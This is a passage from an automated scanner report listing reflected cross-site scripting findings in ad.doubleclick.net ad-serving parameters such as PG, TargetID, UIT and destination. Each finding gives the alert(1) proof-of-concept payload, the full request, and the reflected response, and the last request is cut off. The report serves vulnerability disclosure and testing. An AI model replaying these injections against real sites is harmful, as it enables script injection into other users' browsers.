...[SNIP]...

3.39. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 957fc"-alert(1)-"d44da77d2f was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01957fc"-alert(1)-"d44da77d2f&ASID=19ec05578f844eb7889608a63552ed21&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:39:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5957

document.write('\n<script src=\"http://
...[SNIP]...

minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01957fc"-alert(1)-"d44da77d2f&ASID=19ec05578f844eb7889608a63552ed21&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/da/%2a/g%3B234093089%3B0-0%3B0%3B58016850%3B4307-300/250%3B39944129/39961916/1%3B%3B%7Eokv%3D%3Bpc%3D
...[SNIP]...

3.40. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 575c5'-alert(1)-'ce6ea7837a2 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01575c5'-alert(1)-'ce6ea7837a2&ASID=19ec05578f844eb7889608a63552ed21&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:39:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5916

document.write('\n<script src=\"http://
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01575c5'-alert(1)-'ce6ea7837a2&ASID=19ec05578f844eb7889608a63552ed21&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/n%3B234093089%3B2-0%3B0%3B58016850%3B4307-300/250%3B40240355/40258142/1%3B%3B%7Eokv%3D%3Bpc%3D
...[SNIP]...

3.41. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1ad7'-alert(1)-'6518e291e0a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013d1ad7'-alert(1)-'6518e291e0a&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:39:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5916

document.write('\n<script src=\"http://
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013d1ad7'-alert(1)-'6518e291e0a&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/n%3B234093089%3B2-0%3B0%3B58016850%3B4307-300/250%3B40240355/40258142/1
...[SNIP]...

3.42. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94d30"-alert(1)-"8b55e0bb77d was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=3561301394d30"-alert(1)-"8b55e0bb77d&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:39:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5916

document.write('\n<script src=\"http://
...[SNIP]...
pharm_300x250_30k.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=3561301394d30"-alert(1)-"8b55e0bb77d&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/n%3B234093089%3B2-0%3B0%3B58016850%3B4307-300/250%3B40240355/40258142/1
...[SNIP]...

3.43. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7979c'-alert(1)-'f544c2be9b4 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G7979c'-alert(1)-'f544c2be9b4&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:39:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5960

document.write('\n<script src=\"http://
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G7979c'-alert(1)-'f544c2be9b4&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/g%3B234093089%3B0-0%3B0%3B58016850%3B4307-300/250%3B3
...[SNIP]...

3.44. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8dd9e"-alert(1)-"bac4710a2e0 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G8dd9e"-alert(1)-"bac4710a2e0&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:39:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5916

document.write('\n<script src=\"http://
...[SNIP]...
659706/1-2010_nm_1pharm_300x250_30k.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G8dd9e"-alert(1)-"bac4710a2e0&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/n%3B234093089%3B2-0%3B0%3B58016850%3B4307-300/250%3B4
...[SNIP]...

3.45. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd370"-alert(1)-"e92f68c2856 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=fd370"-alert(1)-"e92f68c2856 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5916
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:39:48 GMT
Expires: Sun, 13 Feb 2011 14:39:48 GMT

document.write('\n<script src=\"http://
...[SNIP]...
= escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=fd370"-alert(1)-"e92f68c2856http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/n%3B234093089%3B2-0%3B0%3B58016850%3B4307-300/250%3B40240355/40258142/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.co
...[SNIP]...

3.46. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 328ea'-alert(1)-'6460123b8f1 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=328ea'-alert(1)-'6460123b8f1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5935
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:39:53 GMT
Expires: Sun, 13 Feb 2011 14:39:53 GMT

document.write('\n<script src=\"http://
...[SNIP]...
\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=328ea'-alert(1)-'6460123b8f1http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/y%3B234093089%3B1-0%3B0%3B58016850%3B4307-300/250%3B39944238/39962025/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.co
...[SNIP]...

3.47. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba14e"-alert(1)-"6c567b7030 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!ba14e"-alert(1)-"6c567b7030&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:38:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5913

document.write('\n<script src=\"http://
...[SNIP]...
ttp://s0.2mdn.net/1659706/1-2010_nm_1pharm_300x250_30k.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!ba14e"-alert(1)-"6c567b7030&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/da/%2a/n%3B234093089%3B2-0%3B0%3B58016850
...[SNIP]...

3.48. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7dac'-alert(1)-'2dbc61c243d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!a7dac'-alert(1)-'2dbc61c243d&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:38:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5960

document.write('\n<script src=\"http://
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!a7dac'-alert(1)-'2dbc61c243d&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/g%3B234093089%3B0-0%3B0%3B58016850
...[SNIP]...

3.49. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3695'-alert(1)-'ce01b39cac5 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697d3695'-alert(1)-'ce01b39cac5&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:36:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5846

document.write('\n<script src=\"http://s
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697d3695'-alert(1)-'ce01b39cac5&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/s%3B234423842%3B4-0%3B0%3B59000131%3B4307-300/
...[SNIP]...

3.50. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 500dd"-alert(1)-"f89c0be48d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697500dd"-alert(1)-"f89c0be48d&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:36:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5947

document.write('\n<script src=\"http://s
...[SNIP]...
011Launch_LikeAnofall_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697500dd"-alert(1)-"f89c0be48d&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/d%3B234423842%3B0-0%3B0%3B59000131%3B4307-300/
...[SNIP]...

3.51. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12462"-alert(1)-"d89e665cac9 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=164797102512462"-alert(1)-"d89e665cac9&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
